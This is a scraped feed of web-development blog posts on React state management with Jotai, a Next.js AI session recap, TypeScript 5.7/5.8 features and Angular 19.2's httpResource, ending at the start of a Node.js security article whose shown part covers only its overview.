  const currentCart = get(cartItemsAtom);
  const existingItemIndex = currentCart.findIndex(
    (cartItem) => cartItem.id === item.id
  );

  let updatedCart: CartItem[];
  if (existingItemIndex !== -1) {
    updatedCart = [...currentCart];
    updatedCart[existingItemIndex] = item;
  } else {
    updatedCart = [...currentCart, item];
  }

  set(cartItemsAtom, updatedCart);

  await saveCartToServer(updatedCart);
});

const loadCartAtom = atom(null, async (_get, set) => {
  const response = await fetch('http://localhost:3001/cart');
  const data: CartItem[] = (await response.json())['items'];
  set(cartItemsAtom, data);
});

export { cartItemsAtom, addToCartAtom, loadCartAtom };

You implement your application’s atoms separately from your components. For the cartItemsAtom, call the atom function with an empty array and define the type as a CartItem array. When implementing the business logic, also use the atom function, but pass the value null as the first argument and a function as the second. This creates a derived atom that only allows write access. In the function, you have access to the get and set functions. You can use these to access another atom – in this case, the cartItemsAtom. You can also support additional parameters that are passed when the function is called. For write access with set, pass a reference to the atom and then the updated value. Since the function can be asynchronous, you can easily integrate a side effect like loading data from the server or writing the updated shopping cart. The atoms are integrated into the application components using the Jotai hook functions. Listing 10 shows how this works in the ListItem component example.

Listing 10: Integration in the ListItem Component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useAtom, useAtomValue, useSetAtom } from 'jotai';
import { cartItemsAtom, addToCartAtom } from './cart.atom';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const cartItems = useAtomValue(cartItemsAtom);
  const addToCart = useSetAtom(addToCartAtom);

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

For read access, you can use the useAtomValue function directly, since you use the derived atoms for write operations. The useSetAtom function is used for this. To add a product to the shopping cart, simply call the addToCart function with the new shopping cart item. Jotai takes care of everything else. This is also true when updating all components affected by the atom change.
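
Derived atoms can also be read-only, which fits the CartOverview component mentioned earlier. The following sketch assumes that CartItem carries a price field, which is not shown in the type definitions above:

import { FC } from 'react';
import { atom, useAtomValue } from 'jotai';
import { cartItemsAtom } from './cart.atom';

// Read-only derived atom: recalculates whenever cartItemsAtom changes
// (assumes CartItem has a price field)
const cartTotalAtom = atom((get) =>
  get(cartItemsAtom).reduce((sum, item) => sum + item.quantity * item.price, 0)
);

const CartOverview: FC = () => {
  const cartItems = useAtomValue(cartItemsAtom);
  const total = useAtomValue(cartTotalAtom);

  return (
    <div>
      {cartItems.length} products in the cart, total: {total.toFixed(2)}
    </div>
  );
};

export default CartOverview;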

Conclusion

In this article, you learned about different approaches to state management in a React application. We focused on lightweight approaches that don’t dictate your application’s entire architecture. The first approach used React’s very own interfaces – state or reducers and context. This gives you the maximum amount of freedom and flexibility in your implementation, but you also must take care of all the implementation details yourself.

If you’re willing to sacrifice some of this flexibility and accept an extra dependency in your application, libraries like Zustand or Jotai are a helpful alternative. Both libraries take different approaches. Zustand offers a compact solution that concentrates both the structure and logic in one structure. Jotai, on the other hand, works with smaller units and lets you derive or combine these units, making your application more flexible and individual parts easier to exchange. Ultimately, the solution you choose depends upon the use case and your personal preferences.

🔍 Frequently Asked Questions (FAQ)

1. What are common reasons for implementing central state management in React?

Central state management is often necessary due to the component-based architecture of single-page applications. It enables efficient data sharing between deeply nested components without passing props through intermediate layers.

2. How does React’s Context API facilitate central state management?

The Context API allows React components to access shared state directly, bypassing the need to pass data through the component tree. This improves reusability and reduces coupling between components.

3. What are typical use cases for central state management in frontend applications?

Use cases include applications involving data record management such as e-commerce carts, address books, fleet management, and smart home systems. These scenarios require consistent, shared data access across multiple components.

4. How can you implement state management using only React without external libraries?

You can use a combination of useState and the Context API to manage and distribute state throughout the component tree. This lightweight method avoids additional dependencies but may require more boilerplate.

5. What are the advantages and limitations of Redux for state management?

Redux offers powerful state control and is suitable for large-scale applications, especially with tools like Redux Toolkit. However, it can introduce unnecessary overhead for smaller projects.

6. How does the useReducer hook enhance state logic separation?

The useReducer hook enables state manipulation through pure functions and action objects, improving code clarity and testability. It also allows the introduction of middleware for handling asynchronous actions.

7. What benefits does Zustand offer over React’s built-in state tools?

Zustand simplifies state logic by consolidating state and actions into centralized stores, avoiding the need for context providers. It supports asynchronous operations and optional local persistence via middleware.

8. How does Jotai manage state differently than Zustand?

Jotai uses atomic state units called atoms and provides fine-grained state control with minimal coupling. It emphasizes modularity and composability, which can lead to cleaner, more scalable code structures.

9. When should you choose Zustand or Jotai over native React state solutions?

Libraries like Zustand and Jotai are ideal when you want to reduce boilerplate, avoid prop drilling, and need a lightweight but scalable alternative to Redux. The choice depends on project complexity and team preferences.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman https://javascript-conference.com/blog/ai-nextjs-nir-kaufman-workshop/ Wed, 09 Jul 2025 16:26:32 +0000 https://javascript-conference.com/?p=108186 In today’s fast-evolving web development landscape, integrating AI into your apps isn't just a trend—it's becoming a necessity. In this hands-on session, Nir Kaufman walks developers through building AI-driven applications using the Next.js framework. Whether you're exploring generative AI, large language models (LLMs), or building smarter interfaces, this session provides the perfect foundation.

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
The session dives deep into practical ways to incorporate AI into web applications using Next.js, covering everything from LLM fundamentals to real-world coding demos.

1. Understanding AI and Large Language Models (LLMs)

The session begins with an overview of how AI—especially generative AI models—can enhance modern web applications. Nir explains how LLMs understand and generate content based on user queries, opening the door to intelligent, context-aware features.

2. Integrating AI into Next.js

Participants learn how to connect their Next.js projects with AI APIs, fetching and utilizing model-generated data to enhance app functionality. This includes server-side and client-side integration techniques that ensure seamless performance.

3. Creating Intelligent, Adaptive Interfaces

One key highlight is building UIs that dynamically respond to user behavior. Nir demonstrates how to use AI-generated data to create content and interfaces that feel personalized and highly interactive.

4. Hands-On Coding Examples

Throughout the session, attendees follow along with real-world code samples. From generating UI components based on prompts to managing complex application state with AI logic, each example is designed for immediate application.

5. Best Practices for AI Integration

  • Performance: Use caching and smart data-fetching strategies to avoid bottlenecks.
  • Security: Keep API keys secure and handle user data responsibly.
  • Scalability: Design systems that can scale with increasing AI workloads.

Key Takeaways

  • AI enhances—rather than replaces—developer capabilities.
  • Dynamic user experiences are possible with personalized content generation.
  • Efficient state management is crucial in AI-enhanced UIs.
  • Security and privacy must be top priorities when dealing with user data and AI APIs.

Conclusion

This session equips developers with the tools and mindset to begin building powerful, AI-driven web applications using Next.js. Nir Kaufman’s practical approach bridges theory with real-world implementation, making it easier than ever to bring AI into your development stack.

If you’re ready to explore AI-powered features and elevate your web applications, this session is a must-watch. Watch the full video above and start turning your ideas into intelligent applications today.

Watch the full session below:

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
What’s New in TypeScript 5.7/5.8 https://javascript-conference.com/blog/typescript-5-7-5-8-features-ecmascript-direct-execution/ Thu, 26 Jun 2025 12:29:50 +0000 https://javascript-conference.com/?p=108154 TypeScript is widely used today for developing modern web applications because it offers several advantages over a pure JavaScript approach. For example, TypeScript's static type system allows the written program code to be checked for errors during development and build time. This is also known as static code analysis and contributes to the long-term maintainability of the project. The two latest versions, TypeScript 5.7 from November 2024 and 5.8 from March 2025, bring several improvements and new features, which we will explore below.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Improved Type Safety

TypeScript improves type safety in several areas. Variables that are never initialized are now detected more reliably. If a variable is declared but never assigned a value, the compiler reports an error. In certain situations, however, TypeScript cannot determine this unambiguously. Listing 1 shows such a situation: within the function definition of “printResult()”, TypeScript cannot clearly determine which path is taken in the outer (separate) function. Therefore, TypeScript makes the “optimistic” assumption that the variable will be initialized.

Listing 1: Optimistic type check in different functional contexts

function foo() {
  let result: number
  if (myCondition()) {
    result = myCalculation();
  } else {
    const temporaryWork = myOtherCalculation();
    // forgot to assign 'result'
  }
  printResult();
  function printResult() {
    console.log(result); // no compiler error
  }
}

With version 5.7, this situation has been improved, at least in cases where no conditions are used. In Listing 2, the variable “result” is not assigned, but this is also recognized within the function “printResult()” and now results in a compiler error.

Listing 2: Optimistic type check in different functional contexts

function foo() {
  let result: number
  // further logic in which 'result' is never assigned

  printResult();
  function printResult() {
    console.log(result);
    // Variable 'result' is used before being assigned.(2454)
  }
}

Another type check ensures that methods with non-literal (or composite, ‘computed’) property names are consistently treated as index signatures in classes. This is shown in Listing 3 using a method that was created using an index signature.

Listing 3: Index signatures for classes

declare const sym: symbol;
export class MyClass {
  [sym]() { return 1; }
}
// Is interpreted as
export class MyClass { [x: symbol]: () => number; }

Previously, this method was ignored by the type system. With 5.7, it now appears as an index signature ([x: symbol] signature). This harmonizes the behavior with object literals and can be particularly useful for generic APIs.

Last but not least, version 5.7 introduces a stricter error message under the “noImplicitAny” compiler option. When this option is enabled, function definitions that do not declare an explicit return type are now checked more thoroughly. Functions without a return type are often arrow functions that are used as callback handlers, for example, in promise chains: “catch(() => null)”. If such handlers implicitly return “null” or “undefined,” the error “TS7011: Function expression, which lacks return-type annotation, implicitly has an ‘any’ return type” is now displayed. The typing is therefore stricter here, so that runtime errors can be better avoided in the future.

Latest ECMAScript and Node.js Support

With TypeScript 5.7, ECMAScript version 2024 can now be used as the compile target (e.g., via the compiler flag --target es2024). This is particularly useful for staying up to date and gaining access to the latest language features and new APIs. New APIs include “Object.groupBy()” and “Map.groupBy()”, which can be used to group an iterable or a map. Listing 4 shows this using an array called “inventory” containing various supermarket products. The array is to be divided into two groups: products that are still available (“sufficient”) and products that need to be restocked (“restock”). The function “Object.groupBy()” is passed the array to be grouped and a function that returns which group each item in the array belongs to. The return value of the groupBy function is an object (here the variable “result”) that contains the different groups as properties. Each group is again an array (see the console.log outputs in Listing 4). If a group does not contain any entries, the entire group is “undefined.”

Listing 4: Grouping arrays with Object.groupBy()

const inventory = [
 { name: "asparagus", type: "vegetables", quantity: 9 },
 { name: "bananas", type: "fruit", quantity: 5 },
 { name: "cherries", type: "fruit", quantity: 12 }
];

const result = Object.groupBy(inventory, ({ quantity }) =>
 quantity < 10 ? "restock" : "sufficient",
);

console.log(result.restock);
// [{ name: "asparagus", type: "vegetables", quantity: 9 },
//  { name: "bananas", type: "fruit", quantity: 5 }]

console.log(result.sufficient);
// [{ name: "cherries", type: "fruit", quantity: 12 }]

If more complex calculations are performed, or if WASM, multiple workers, and correspondingly complex setups are used, TypedArray classes (e.g., “Uint8Array”), “ArrayBuffer,” and/or “SharedArrayBuffer” are also frequently used. The length of ArrayBuffers can be changed in ES2024 (‘resize()’), while SharedArrayBuffers can ‘only’ grow (‘grow()’). Therefore, both buffer variants obviously have different APIs. However, the TypedArray classes always use a buffer under the hood. To harmonize the newly created API differences, the common supertype ‘ArrayBufferLike’ is used. If a specific implementation is to be used, the buffer type used can now be specified explicitly, as all TypedArray classes are now generically typed with respect to the underlying buffer types. Listing 5 illustrates this, showing that in the case of “Uint8Array,” “view” can always access the correct buffer variant “SharedArrayBuffer.”

Listing 5: TypedArrays with a generic buffer type

// New: TypedArray with a generic ArrayBuffer type
interface Uint8Array<T extends ArrayBufferLike = ArrayBufferLike> { /* ... */ }

// Usage with a concrete type:
// here: SharedArrayBuffer
const buffer = new SharedArrayBuffer(16, { maxByteLength: 1024 });
const view = new Uint8Array(buffer);

view.buffer.grow(512); // `grow` only exists on SharedArrayBuffer

Directly Executable TypeScript

In addition to the new features, TypeScript also supports libraries and runtimes that execute TypeScript files directly without a compile step (e.g., “ts-node,” “tsx,” or Node 23.x with “--experimental-strip-types”). Direct execution of TypeScript can speed up development processes because the build/compile step between writing and running code is skipped and only “caught up” later. This becomes possible when relative imports are adjusted: normally, imports do not have a file extension (see Listing 6), so that the imports do not have to differ between the source code and the compiled result. However, executing a file directly without a compile step requires the “.ts” extension (Listing 6). Such an import usually results in a compiler error. With the new compiler option “--rewriteRelativeImportExtensions,” all TypeScript extensions are automatically rewritten (from .ts/.tsx/.mts/.cts to .js/.jsx/.mjs/.cjs). On the one hand, this provides better support for direct execution. On the other hand, it is still possible to use and compile the TypeScript files in the normal TypeScript build process, which is important, for example, for authors of libraries who want to test their files quickly without a compile step but also need the real TypeScript build before publishing the library.

Listing 6: Import with .ts extension

import {Demo} from './bar'; // <- standard import
import {Demo} from './bar.ts'; // <- required for direct execution

If the Node.js option “--experimental-strip-types” is used to execute TypeScript directly, care must be taken to ensure that only TypeScript constructs that are easy to remove (strip) for Node.js are used. To better support this use case, the new compiler option “--erasableSyntaxOnly” has been added in 5.8. This option prohibits TypeScript-only features such as enums, namespaces, parameter properties (see also Listing 7), and special import forms and marks them as compiler errors.

Listing 7: Constructs prohibited under “--erasableSyntaxOnly”

// error: namespace with runtime code
namespace container {
}

class Point {
  // error: implicit properties / parameter properties
  constructor(public x: number, public y: number) { }
}

// error: enum declaration
enum Direction {
  Up,
  Down
}

Further Improvements

The TypeScript team naturally wants to make the development process as pleasant as possible for all developers. To this end, it also uses all the new options available under the hood. In Node.js 22, for example, a caching API (“module.enableCompileCache()”) was introduced, which TypeScript now uses to save recurring parsing and compilation costs. In benchmarks, compiling with tsc was about two to three times faster than before.

By default, the compiler checks whether special “@typescript/lib-*” packages are installed. These packages can be used to replace the standard TypeScript libraries in order to customize the behavior of what are actually native TypeScript APIs. Previously, the check for such library packages was always performed, even if no library packages were used. This can mean unnecessary overhead for many files or in large projects. With the new compiler option “--libReplacement” set to false, this behavior can be disabled, which can improve initialization time, especially in very large projects and monorepos.
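
If a project does not rely on any “@typescript/lib-*” replacement packages, the option could be switched off in the project configuration, for example like this (a sketch; whether you set it in tsconfig.json or on the command line depends on your setup, and the surrounding options are assumptions):

{
  "compilerOptions": {
    "target": "es2024",
    "libReplacement": false
  }
}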

Support for developer tools is also an important task for TypeScript. Therefore, there have also been updates to project and editor support. When an editor that uses the TS language server loads a file, it searches for the corresponding “tsconfig.json.” Previously, it stopped at the first match, which often led to the editor assigning the wrong configuration to a file in monorepo-like structures and thus not offering correct developer support. With the new TypeScript versions, the directory tree is now searched further upward if necessary to find a suitable configuration. For example, in Listing 8, the test file “foo-test.ts” is now correctly associated with the configuration “projekt/src/tsconfig.test.json” and not accidentally with the main configuration “projekt/tsconfig.json”. This makes it easier to work in workspaces or composite setups with multiple subprojects.

Listing 8: Repo structure with multiple TSConfigs

projekt/
├── src/
│   ├── tsconfig.json
│   ├── tsconfig.test.json
│   ├── foo.ts
│   └── foo-test.ts
└── tsconfig.json

Conclusion

TypeScript 5.7 and 5.8 offer a variety of direct and indirect improvements for developers. In particular, they increase type safety (better errors for uninitialized variables, stricter return checks) and bring the language up to date with ECMAScript. At the same time, they improve the developer experience through faster build processes (compile caching, optimized checks), extended Node.js support, and more flexible configuration for monorepos.

The TypeScript team is already working on many large and small improvements for the future. TypeScript 5.9 is in the starting blocks and is scheduled for release at the end of July. In addition, a major change is planned: the TypeScript compiler is to be completely rewritten in Go for version 7. Initial tests have shown that with the help of the new compiler written in Go, it is possible to achieve up to 10 times faster builds for your own projects.

🔍 Frequently Asked Questions (FAQ)

1. What are the key improvements in TypeScript 5.7?
TypeScript 5.7 brings a host of enhancements, including better type safety, improved management of uninitialized variables, stricter enforcement of return types, and a more consistent approach to recognizing computed property names as index signatures.

2. How does TypeScript 5.8 support direct execution?
With TypeScript 5.8, you can now run .ts files directly using tools like ts-node or Node.js with the --experimental-strip-types flag. New compiler options like --rewriteRelativeImportExtensions and --erasableSyntaxOnly make this process even smoother.

3. What new JavaScript (ECMAScript 2024) features are supported?
TypeScript has added support for ECMAScript 2024 features, including Object.groupBy() and Map.groupBy(), which allow for powerful grouping operations on arrays and maps. It also introduces support for resizable and growable ArrayBuffer and SharedArrayBuffer types.

4. What does the --erasableSyntaxOnly compiler option do?
The --erasableSyntaxOnly option, introduced in TypeScript 5.8, prevents the use of TypeScript-specific constructs like enums, namespaces, and parameter properties in code meant for direct execution, ensuring it works seamlessly with Node.js’s stripping behavior.

5. How has type checking changed for computed method names?
In TypeScript 5.7, methods that use computed (non-literal) property names in classes are now treated as index signatures. This change aligns class behavior more closely with object literals, enhancing consistency for generic and dynamic APIs.

6. What are the benefits of compile caching in newer versions?
TypeScript now takes advantage of Node.js’s compile cache API, which cuts down on unnecessary parsing and compilation. This results in build times that can be 2 to 3 times faster, particularly in larger projects.

7. How does TypeScript handle multiple tsconfig files in monorepos?
In TypeScript 5.8, the compiler and language server have improved support for monorepos by continuing to search parent directories for the most suitable tsconfig.json. This enhancement boosts file association and IntelliSense accuracy in complex workspaces.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Exploring httpResource in Angular 19.2 https://javascript-conference.com/blog/exploring-httpresource-angular-19/ Mon, 19 May 2025 11:30:20 +0000 https://javascript-conference.com/?p=107841 Angular 19.2 introduced the experimental httpResource feature, streamlining HTTP data loading within the reactive flow of applications. By leveraging signals, it simplifies asynchronous data fetching, providing developers with a more streamlined approach to handling HTTP requests. With Angular 20 on the horizon, this feature will evolve further, offering even more power for managing data in reactive applications. Let’s explore how to leverage httpResource to enhance your applications.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
As an example, we have a simple application that scrolls through levels in the style of the game Super Mario. Each level consists of tiles that are available in four different styles: overworld, underground, underwater, and castle. In our implementation, users can switch freely between these styles. Figure 1 shows the first level in overworld style, while Figure 2 shows the same level in underground style.

Figure 1: Level 1 in overworld style

Figure 2: Level 1 in the underground style

LevelComponent in the example application takes care of loading level files (JSON) and tiles for drawing the levels using an httpResource. To render and animate the levels, the example relies on a very simple engine that is included with the source code but is treated as a black box here in the article.

HttpClient under the hood enables the use of interceptors

At its core, the new httpResource currently uses the good old HttpClient. Therefore, the application has to provide this service, which is usually done by calling provideHttpClient during bootstrapping. As a consequence, the httpResource also automatically picks up the registered HttpInterceptors.

However, the HttpClient is just an implementation detail that Angular may eventually replace with a different implementation.
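
A minimal bootstrap sketch for a standalone application could look like this; the authInterceptor and the file paths are assumptions:

import { bootstrapApplication } from '@angular/platform-browser';
import { provideHttpClient, withInterceptors } from '@angular/common/http';
import { AppComponent } from './app/app.component';
import { authInterceptor } from './app/auth.interceptor';

bootstrapApplication(AppComponent, {
  providers: [
    // httpResource delegates to HttpClient, so registered interceptors apply to it as well
    provideHttpClient(withInterceptors([authInterceptor])),
  ],
});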

Level files

In our example, the different levels are described by JSON files, which define which tiles are to be displayed at which coordinates (Listing 1).

Listing 1:

{
  "levelId": 1,
  "backgroundColor": "#9494ff",
  "items": [
    { "tileKey": "floor", "col": 0, "row": 13, [...] },
    { "tileKey": "cloud", "col": 12, "row": 1, [...] },
    [...]
  ]
}

These coordinates define positions within a matrix of blocks measuring 16×16 pixels. An overview.json file is provided with these level files, which provides information about the names of the available levels.

LevelLoader takes care of loading these files. To do this, it uses the new httpResource (Listing 2).

Listing 2:

@Injectable({ providedIn: 'root' })
export class LevelLoader {
  getLevelOverviewResource(): HttpResourceRef<LevelOverview> {
    return httpResource<LevelOverview>('/levels/overview.json', {
      defaultValue: initLevelOverview,
    });
  }

  getLevelResource(levelKey: () => string | undefined): HttpResourceRef<Level> {
    return httpResource<Level>(() => !levelKey() ? undefined : `/levels/${levelKey()}.json`, {
      defaultValue: initLevel,
    });
  }

 [...]
}

The first parameter passed to httpResource represents the respective URL. The second optional parameter accepts an object with further options. This object allows the definition of a default value that is used before the resource has been loaded.

The getLevelResource method expects a signal with a levelKey, from which the service derives the name of the desired level file. This read-only signal is an abstraction of the type () => string | undefined.

The URL passed from getLevelResource to httpResource is a lambda expression that the resource automatically reevaluates when the levelKey signal changes. In the background, httpResource uses it to generate a computed signal that acts as a trigger: every time this trigger changes, the resource loads the URL.

To prevent the httpResource from being triggered, this lambda expression must return the value undefined. This way, the loading can be delayed until the levelKey is available.
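
A sketch of how LevelComponent might consume such a resource is shown below; the template, the file path, and the hand-over to the rendering engine are assumptions:

import { Component, effect, inject, signal } from '@angular/core';
import { LevelLoader } from './level-loader';

@Component({
  selector: 'app-level',
  template: '...',
})
export class LevelComponent {
  private levelLoader = inject(LevelLoader);

  // Stays undefined until a level is selected, which delays the HTTP request
  protected levelKey = signal<string | undefined>(undefined);
  protected levelResource = this.levelLoader.getLevelResource(this.levelKey);

  constructor() {
    effect(() => {
      if (!this.levelResource.isLoading()) {
        const level = this.levelResource.value();
        // hand the loaded level over to the rendering engine here
      }
    });
  }
}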

Further options with HttpResourceRequest

To get more control over the outgoing HTTP request, the caller can pass an HttpResourceRequest instead of a URL (Listing 3).

Listing 3:

getLevelResource(levelKey: () => string) {
  return httpResource<Level>(
    () => ({
      url: `/levels/${levelKey()}.json`,
      method: "GET",
      headers: {
        accept: "application/json",
      },
      params: {
        levelId: levelKey(),
      },
      reportProgress: false,
      body: null,
      transferCache: false,
      withCredentials: false,
    }),
    { defaultValue: initLevel }
  );
}

This HttpResourceRequest can also be represented by a lambda expression, which the httpResource uses to construct a computed signal internally.

It is important to note that although the httpResource offers the option to specify HTTP methods (HTTP verbs) beyond GET and a body that is transferred as a payload, it is only intended for retrieving data. These options allow you to integrate web APIs that do not adhere to the semantics of HTTP verbs. By default, the httpResource converts the passed body to JSON.

With the reportProgress option, the caller can request information about the progress of the current operation. This is useful when downloading large files. I will discuss this in more detail below.

Analyzing and validating the received data

By default, the httpResource expects data in the form of JSON that matches the specified type parameter. In addition, a type assertion is used to ensure that TypeScript assumes the presence of correct types. However, it is possible to intervene in this process to provide custom logic for validating the received raw value and converting it to the desired type. To do this, the caller defines a function using the map property in the options object (Listing 4).

Listing 4:

getLevelResourceAlternative(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      return toLevel(raw);
    },
  });
}

The httpResource converts the received JSON into an object of type unknown and passes it to map. In our example, a simple self-written function toLevel is used. In addition, map also allows the integration of libraries such as Zod, which performs schema validation.
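As a rough sketch of the Zod variant, a schema mirroring the JSON from Listing 1 could be plugged into map as follows; the schema and the method name are assumptions and not part of the example project:

import { z } from 'zod';

// Schema mirroring the structure shown in Listing 1 (abbreviated)
const LevelSchema = z.object({
  levelId: z.number(),
  backgroundColor: z.string(),
  items: z.array(
    z.object({ tileKey: z.string(), col: z.number(), row: z.number() })
  ),
});

// Inside the LevelLoader service:
getLevelResourceWithZod(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    // parse throws if the raw value does not match the schema
    map: (raw) => LevelSchema.parse(raw) as Level,
  });
}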


Loading data other than JSON

By default, httpResource expects a JSON document, which it converts into a JavaScript object. However, it also offers variants that return other forms of representation:

  • httpResource.text returns text
  • httpResource.blob returns the retrieved data as a blob
  • httpResource.arrayBuffer returns the retrieved data as an ArrayBuffer

To demonstrate the use of these possibilities, the example discussed here requests an image with all possible tiles as a blob. From this blob, it derives the tiles required for the selected level style. Figure 3 shows a section of this tilemap and illustrates that the application can switch between the individual styles by choosing a horizontal or vertical offset.

Figure 3: Section of the tilemap used in the example (Source)

A TilesMapLoader delegates to httpResource.blob to load the tilemap (Listing 5).

Listing 5:

@Injectable({ providedIn: "root" })
export class TilesMapLoader {
  getTilesMapResource(): HttpResourceRef<Blob | undefined> {
    return httpResource.blob({
      url: "/tiles.png",
      reportProgress: true,
    });
  }
}

This resource also requests progress information, which the example displays to the left of the drop-down fields.

Putting it all together: reactive flow

The httpResources described in the last sections can now be combined into the reactive graph of the application (Figure 4).

Figure 4: Reactive flow of ngMario

The signals levelKey, style, and animation represent the user input. The first two correspond to the drop-down fields at the top of the application. The animation signal contains a Boolean that indicates whether the animation was started by clicking the Toggle Animation button (see screenshots above).

The tilesResource is a classic resource that derives the individual tiles for the selected style from the tilemap. To do this, it essentially delegates to a function of the game engine, which is treated as a black box here.

The rendering is triggered by an effect, especially since we cannot draw the level directly using data binding. It draws or animates the level on a canvas, which the application retrieves as a signal-based viewChild. Angular then calls the effect whenever the level (provided by the levelResource), the style, the animation flag, or the canvas changes.

The tilesMapProgress signal uses the progress information provided by tilesMapResource to indicate how much of the tilemap has already been downloaded. To load the list of available levels, the example uses a levelOverviewResource that is not directly connected to the reactive graph discussed so far.

Listing 6 shows the implementation of this reactive flow in the form of fields of the LevelComponent.

Listing 6:

export class LevelComponent implements OnDestroy {
  private tilesMapLoader = inject(TilesMapLoader);
  private levelLoader = inject(LevelLoader);

  canvas = viewChild<ElementRef<HTMLCanvasElement>>("canvas");

  levelKey = linkedSignal<string | undefined>(() => this.getFirstLevelKey());
  style = signal<Style>("overworld");
  animation = signal(false);

  tilesMapResource = this.tilesMapLoader.getTilesMapResource();
  levelResource = this.levelLoader.getLevelResource(this.levelKey);
  levelOverviewResource = this.levelLoader.getLevelOverviewResource();

  tilesResource = createTilesResource(this.tilesMapResource, this.style);

  tilesMapProgress = computed(() =>
    calcProgress(this.tilesMapResource.progress())
  );

  constructor() {
    [...]
    effect(() => {
      this.render();
    });
  }

  reload() {
    this.tilesMapResource.reload();
    this.levelResource.reload();
  }

  private getFirstLevelKey(): string | undefined {
    return this.levelOverviewResource.value()?.levels?.[0]?.levelKey;
  }

  [...]
}

Using a linkedSignal for the levelKey allows us to use the first level as the default value as soon as the list of levels has been loaded. The getFirstLevelKey helper returns this from the levelOverviewResource.

The effect retrieves the named values from the respective signals and passes them to the engine’s animateLevel or renderLevel function (Listing 7).

Listing 7:

private render() {
  const tiles = this.tilesResource.value();
  const level = this.levelResource.value();
  const canvas = this.canvas()?.nativeElement;
  const animation = this.animation();

  if (!tiles || !canvas) {
    return;
  }

  if (animation) {
    animateLevel({
      canvas,
      level,
      tiles,
    });
  } else {
    renderLevel({
      canvas,
      level,
      tiles,
    });
  }
}

Resources and missing parameters

The tilesResource shown in the diagram simply delegates to the asynchronous extractTiles function, which the engine also provides (Listing 8).

Listing 8:

function createTilesResource(
  tilesMapResource: HttpResourceRef<Blob | undefined>,
  style: () => Style
) {
  // undefined prevents the resource from being triggered;
  // reading the value inside computed keeps the request reactive
  const request = computed(() => {
    const tilesMap = tilesMapResource.value();
    return !tilesMap
      ? undefined
      : {
          tilesMap,
          style: style(),
        };
  });

  return resource({
    request,
    loader: (params) => {
      const { tilesMap, style } = params.request!;
      return extractTiles(tilesMap, style);
    },
  });
}

This simple resource contains an interesting detail: before the tilemap is loaded, the tilesMapResource has the value undefined. However, we cannot call extractTiles without a tilesMap. The request signal takes this into account: it returns undefined if no tilesMap is available yet, so the resource does not trigger its loader.


Displaying Progress

The tilesMapResource was configured above to provide information about the download progress via its progress signal. A computed signal in the LevelComponent projects it into a string for display (Listing 9).

Listing 9:

function calcProgress(progress: HttpProgressEvent | undefined): string {
  if (!progress) {
    return "-";
  }

  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + "%";
  }

  const kb = Math.round(progress.loaded / 1024);
  return kb + " KB";
}

If the server reports the file size, this function calculates a percentage for the portion already downloaded. Otherwise, it just returns the number of kilobytes already downloaded. There is no progress information before the download starts. In this case, only a hyphen is used.

To test this function, it makes sense to throttle the browser’s network connection in the developer tools and press the reload button in the application to instruct the resources to reload the data.

Status, header, error, and more

In case the application needs the status code or the headers of the HTTP response, the httpResource provides the corresponding signals:

console.log(this.levelOverviewResource.status());
console.log(this.levelOverviewResource.statusCode());
console.log(this.levelOverviewResource.headers()?.keys());

In addition, the httpResource provides everything that is also known from ordinary resources, including an error signal that provides information about any errors that may have occurred, as well as the option to update the value that is available as a local working copy.
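A brief, hedged sketch of how reading the error signal and updating the local working copy could look in the LevelComponent; the concrete handling is illustrative and not taken from the example project:

// Reading the error signal of the resource
const error = this.levelResource.error();
if (error) {
  console.error('Level could not be loaded', error);
}

// Patching the local working copy without another HTTP request
this.levelResource.update((level) => ({
  ...level,
  backgroundColor: '#000000',
}));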

Conclusion

The new httpResource is another building block that complements Angular’s new signal story. It allows data to be loaded within the reactive graph. Currently, it uses the HttpClient as an implementation detail, which may be replaced by another solution at a later date.

While the HTTP resource also allows data to be retrieved using HTTP verbs other than GET, it is not designed to write data back to the server. This task still needs to be done in the conventional way.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
Common Vulnerabilities in Node.js Web Applications https://javascript-conference.com/blog/node-js-security-vulnerabilities-sql-xss-prevention/ Wed, 23 Apr 2025 07:44:46 +0000 https://javascript-conference.com/?p=107761 As Node.js is widely used to develop scalable and efficient web applications, understanding its vulnerabilities is crucial. In this article, we will explore common security risks, such as SQL injections and XSS attacks, and offer practical strategies to prevent them. By applying these insights, you'll learn how to protect user data and build more secure and reliable applications.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Node.js Overview

Node.js is an open-source, cross-platform server environment that enables server-side JavaScript. Since its initial release in 2009, it has grown to be a favorite among developers for building scalable and efficient web applications. Node.js is built on Chrome’s V8 JavaScript engine, which provides high speed and performance.

Another important feature of Node.js is its non-blocking, event-driven architecture. This model enables Node.js to handle many concurrent connections and, for this reason, it is often applied in real-time applications including chat applications, online gaming, and live streaming. Its use of the familiar JavaScript language also enhances its adoption.

"Diagram illustrating the Node.js system architecture, showing the interaction between the V8 JavaScript engine, Node.js bindings, the Libuv library, event loop, and asynchronous I/O operations including worker threads for file system, network, and process tasks.

Node.js Architecture

The Node.js architecture is designed to optimize performance and efficiency. It employs an event-driven, non-blocking I/O model to efficiently handle many tasks at a time without being slowed down by I/O operations.

Here are the main components of Node.js architecture:

